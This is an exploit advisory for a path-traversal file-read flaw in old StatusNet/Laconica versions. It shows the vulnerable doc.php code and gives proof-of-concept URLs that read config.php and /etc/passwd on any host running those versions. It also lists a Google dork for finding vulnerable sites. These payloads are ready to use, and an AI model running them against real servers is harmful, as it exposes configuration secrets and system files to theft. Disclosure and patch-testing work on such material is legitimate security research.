StatusNet/Laconica 0.7.4/0.8.2/0.9.0beta3 - Arbitrary File Reading



+-------------------------------------------------------------------------------+

+ StatusNet/Laconica <= 0.7.4, <= 0.8.2, <= 0.9.0beta3 - arbitrary file reading +
+-------------------------------------------------------------------------------+

# Date:
    - 10/10/2013

# Exploit Author:
    - spiderboy

# Vendor Homepage:
    - http://status.net/

# Software Links:
    - http://status.net/laconica-0.7.4.tar.gz
    - http://status.net/statusnet-0.8.2.tar.gz
    - http://status.net/statusnet-0.9.0beta3.tar.gz

# Version:
    - Branch 0.7.X : <= 0.7.4
    - Branch 0.8.X : <= 0.8.2
    - Branch 0.9.X : <= 0.9.0beta3

# Tested on:
    - Unix/Linux

# Category:
    - Webapps

# Platform:
    - php

# Advisories :
    - http://status.net/wiki/Security_alert_0000002
    - http://osvdb.org/show/osvdb/95586

# Google Dork:
    - "It runs the StatusNet microblogging software, version 0.8.2"

# Vendor product description:
    - Free and Open Source social software

# Vulnerable code:
    - actions/doc.php:
    --------------------------------------------------------------------
    function handle($args)
    {
        parent::handle($args);
        $this->title    = $this->trimmed('title');
        $this->filename = INSTALLDIR.'/doc-src/'.$this->title; //[1]
        if (!file_exists($this->filename)) {
            $this->clientError(_('No such document.'));
            return;
        }
        $this->showPage();
    }
    --------------------------------------------------------------------
    [1] : No check on user-supplied parameter $this->title

# Proof of concept:
    - http://[host]/index.php?action=doc&title=../config.php
    - http://[host]/index.php?action=doc&title=../../../../../../../../etc/passwd

# Solution:
    - Upgrade to latest version : http://status.net/download